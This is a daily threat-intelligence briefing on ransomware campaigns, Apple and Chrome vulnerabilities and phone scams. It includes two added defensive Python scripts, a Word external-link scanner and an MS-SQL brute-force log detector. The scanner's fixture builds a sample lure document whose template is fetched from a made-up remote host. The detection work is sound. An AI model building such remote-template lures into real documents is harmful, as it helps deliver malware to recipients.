Cyware Daily Threat Intelligence

Daily Threat Briefing May 14, 2024

Efforts by security researchers and law enforcement to combat ransomware face a fresh wave of sophisticated campaigns. "Your document" and "Photo of you???" are among the personal-sounding subject lines that cybercriminals are using in a new LockBit Black ransomware campaign. Distributed by the Phorpiex botnet, the campaign has sent millions of such phishing emails worldwide. Meanwhile, reports that INC Ransom is migrating to a new extortion platform are circulating alongside claims that its source code has been put up for sale; neither has been confirmed.

Also back in the headlines is the DanaBot malware, spread through carefully disguised job application emails whose attached documents contain external links. Additionally, fresh findings from a Sekoia MS-SQL honeypot reveal attacks that deploy Mallox ransomware after brute-forcing exposed database servers.

Top Malware Reported in the Last 24 Hours

INC Ransom source code put on sale

A cybercriminal using the moniker 'salfetka' has been spotted selling the source code of the INC Ransom RaaS operation, offering both Windows and Linux/ESXi versions of the ransomware. Meanwhile, the group is allegedly transitioning to a new data leak extortion platform, hinting at internal changes or a rebranding effort. Some experts caution that the sale could be a scam.

DanaBot infection via external links

DanaBot operators are using documents that load content from external links to evade detection, ASEC reported. Attackers send spam emails carrying a Word attachment disguised as a job application form. ASEC's analysis traces the infection chain from execution of the Word attachment to the installation of DanaBot via PowerShell. Once installed, the malware can steal a variety of data, including screenshots and credentials.
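The briefing does not say which kind of external link the lure uses, only that the Word document contains one. In OOXML, any content a document pulls from outside the package is declared as a relationship with TargetMode="External", so one generic triage step is to open the .docx as a ZIP, read every .rels part, and flag external targets of types Word resolves on open (a remote attached template, a linked OLE object, a frame or subdocument) rather than on click (a hyperlink). The scanner below is an added example written for this briefing, not ASEC's tooling; the two in-memory documents it builds are constructed fixtures, and the URL and host in them are made up.

```python
"""Flag Word documents whose relationships pull content from an external URL.

Added example for this briefing, not ASEC's code. Builds two minimal
constructed .docx files in memory (a benign one with only a hyperlink, and a
lure whose settings part points at a remote template) and scans their
relationship parts for external targets that Word follows on open.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves when the file is opened, so an external
# Target here fetches content without a click. A hyperlink is external by
# design and only fires on user action, so it is listed but not flagged.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}


def external_relationships(docx_bytes):
    """Return (rels_part, rel_type, target) for every relationship with TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def auto_fetch_findings(docx_bytes):
    """Subset of external relationships that Word follows on open rather than on click."""
    return [f for f in external_relationships(docx_bytes) if f[1] in AUTO_FETCH_TYPES]


def _rels_xml(entries):
    """Build a .rels part from (type_suffix, target, external) tuples (constructed fixture)."""
    rows = []
    for i, (suffix, target, external) in enumerate(entries, 1):
        mode = ' TargetMode="External"' if external else ""
        rows.append(f'<Relationship Id="rId{i}" Type="{OFFICE_REL}{suffix}" Target="{target}"{mode}/>')
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">{"".join(rows)}</Relationships>')


def build_docx(settings_entries):
    """Minimal constructed .docx; only the parts this scanner inspects are populated."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", _rels_xml([("officeDocument", "word/document.xml", False)]))
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"/>')
        zf.writestr("word/_rels/document.xml.rels", _rels_xml([
            ("settings", "settings.xml", False),
            ("hyperlink", "https://example.com/careers", True),  # benign, click-to-follow
        ]))
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{w_ns}"/>')
        zf.writestr("word/_rels/settings.xml.rels", _rels_xml(settings_entries))
    return buf.getvalue()


BENIGN_DOC = build_docx([])
# Constructed lure: settings.xml attaches a remote template, fetched when the file opens.
# The host and filename are made up for this example.
LURE_DOC = build_docx([("attachedTemplate", "http://198.51.100.7/job-form.dotm", True)])

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("lure", LURE_DOC)):
        print(label, "external:", external_relationships(doc))
        print(label, "flagged:", auto_fetch_findings(doc))
```

Run the scanner over a real attachment by reading the file bytes and passing them to auto_fetch_findings. An empty result does not clear a document (macros, DDE fields and in-document URLs are separate checks), but a non-empty one identifies exactly which part and URL the document will reach out to on open, which is what an analyst needs to block or detonate it.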

Phorpiex botnet used in LockBit Black ransomware campaign

Security experts at New Jersey's Cybersecurity and Communications Integration Cell (NJCCIC) warned of a LockBit Black ransomware campaign run by the re-emerged Phorpiex botnet. Since April, millions of phishing emails carrying ZIP attachments have been sent. The newer botnet version, dubbed Twizt, operates peer-to-peer rather than through a central command-and-control server, which lets it evade traditional detection and takedown methods. With over 1,500 unique sending IP addresses, the campaign spans multiple countries.

Unveiling the tactics of Mallox ransomware

An incident on the Sekoia research team's MS-SQL honeypot exposed the methods of attackers wielding Mallox ransomware. The intrusions began with brute-force attacks against exposed MS-SQL servers and used the PureCrypter loader to deliver the payload; the analysis identified two distinct affiliates with differing approaches. The Mallox group runs a double extortion scheme and relies on affiliates, including ones known as Maestro and Vampire. Suspicion also fell on the hosting company Xhost Internet, which has been linked to past ransomware activity.
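Because the intrusions described above start with password guessing against the SQL Server login, the earliest signal a defender has is the server's own ERRORLOG, where each failed login is written as an "Error: 18456" pair of lines ending in "[CLIENT: ip]". The script below is an added example for this briefing, not Sekoia's detection logic: it parses a constructed ERRORLOG excerpt, counts failures per client address inside a sliding window, and raises a second, higher-priority alert when a success from the same address follows a flagged burst. It assumes login auditing is set to log both failed and successful logins (by default SQL Server logs only failures, so the success line would be absent); the addresses and timestamps are made up.

```python
"""Brute-force and success-after-brute-force detection over SQL Server ERRORLOG lines.

Added example for this briefing, not Sekoia's tooling. The log excerpt is a
constructed fixture in SQL Server's default ERRORLOG format; addresses are
documentation ranges and the timestamps are invented.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ERRORLOG = """\
2024-05-13 02:14:07.11 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-13 02:14:07.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:07.42 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-13 02:14:07.42 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:07.75 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:08.03 Logon       Error: 18456, Severity: 14, State: 5.
2024-05-13 02:14:08.03 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:08.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:08.64 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-05-13 02:14:09.80 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.45]
2024-05-13 02:20:00.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.12]
"""

# Only the "Login failed/succeeded for user ..." lines carry the client address;
# the preceding "Error: 18456" lines are skipped by this pattern.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'\."
    r".*?\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse(log_text):
    """Turn ERRORLOG text into a list of login events in file order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "outcome": m["outcome"],
                "user": m["user"],
                "client": m["client"],
            })
    return events


def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Alert once per client that reaches `threshold` failures inside `window`,
    and again if that client then logs in successfully (the guess worked)."""
    recent = defaultdict(deque)  # client -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for ev in events:
        q = recent[ev["client"]]
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if ev["outcome"] == "failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["client"] not in flagged:
                flagged.add(ev["client"])
                alerts.append({"kind": "brute_force", "client": ev["client"],
                               "failures": len(q), "at": ev["ts"]})
        elif ev["client"] in flagged:
            alerts.append({"kind": "success_after_brute_force", "client": ev["client"],
                           "user": ev["user"], "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(ERRORLOG)):
        print(alert)
```

The second alert kind is the one worth paging on: a burst of failures is background noise on any internet-exposed SQL Server, but a success from the same address within the window means the attacker now has a session and, in the chain Sekoia describes, the next step is dropping a loader. Tune threshold and window to the server's normal traffic, and feed the script the ERRORLOG from a live host (or the output of the sp_readerrorlog procedure) rather than the fixture.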

Top Vulnerabilities Reported in the Last 24 Hours

Apple products vulnerable to multiple exploits

Numerous security issues in Apple products pose significant risks to users; the most severe, tracked as CVE-2024-23296, could allow arbitrary code execution and threatens government and business entities alike. Attackers can use techniques such as Exploitation for Client Execution (MITRE ATT&CK T1203), potentially gaining kernel privileges or bypassing security measures. The vulnerabilities span macOS, iOS, iPadOS, watchOS, and tvOS.

Apple addresses code execution threat in iTunes

Apple issued a security advisory for an arbitrary code execution vulnerability (CVE-2024-27793) in iTunes for Windows versions prior to 12.13.2. Parsing a maliciously crafted file could let an attacker execute code or cause unexpected program termination. Apple recommends updating to iTunes 12.13.2, which fixes the issue. A severity rating for the vulnerability has not yet been assigned.

Second Chrome zero-day found within a week

Google released a patch for another zero-day vulnerability in Chrome, CVE-2024-4761, the second zero-day it has addressed within a week. The high-severity out-of-bounds write issue in the V8 JavaScript and WebAssembly engine was reported by an anonymous researcher. Google acknowledged that an exploit exists in the wild but disclosed no details of the attacks.

Top Scams Reported in the Last 24 Hours

Inside a sophisticated phone-based cyberattack

Estate, an OTP-interception operation active since mid-2023, has been laid bare after a bug in its own code exposed the site's back-end database. Estate members place unsolicited phone calls and send phishing emails to trick victims into divulging one-time passcodes, allowing them to bypass MFA and hijack accounts. The exposed database revealed tailored attack scripts, target demographics, and a promise of anonymity to members.

Enterprises targeted with spam emails and phone calls

Rapid7 uncovered an ongoing social engineering campaign against enterprises in which a threat actor floods users' inboxes with spam messages and then phones them to offer assistance. The emails masquerade as legitimate newsletter sign-up confirmations. On the call, the threat actor impersonates the company's IT team and persuades the user to install remote monitoring and management (RMM) software to resolve the purported email problem.

FCC issues alert against scammer group

The FCC warned consumers about a group of robocall scammers known as Royal Tiger, designating it the first Consumer Communications Information Services Threat (C-CIST). Led by Prince Jashvantlal Anand and Kaushal Bhavsar, Royal Tiger operates in multiple countries and has used various entities to run illegal robocall campaigns targeting U.S. consumers. Despite previous warnings and cease-and-desist letters, the group continues to run imposter scams, including spoofed calls impersonating banks and government agencies.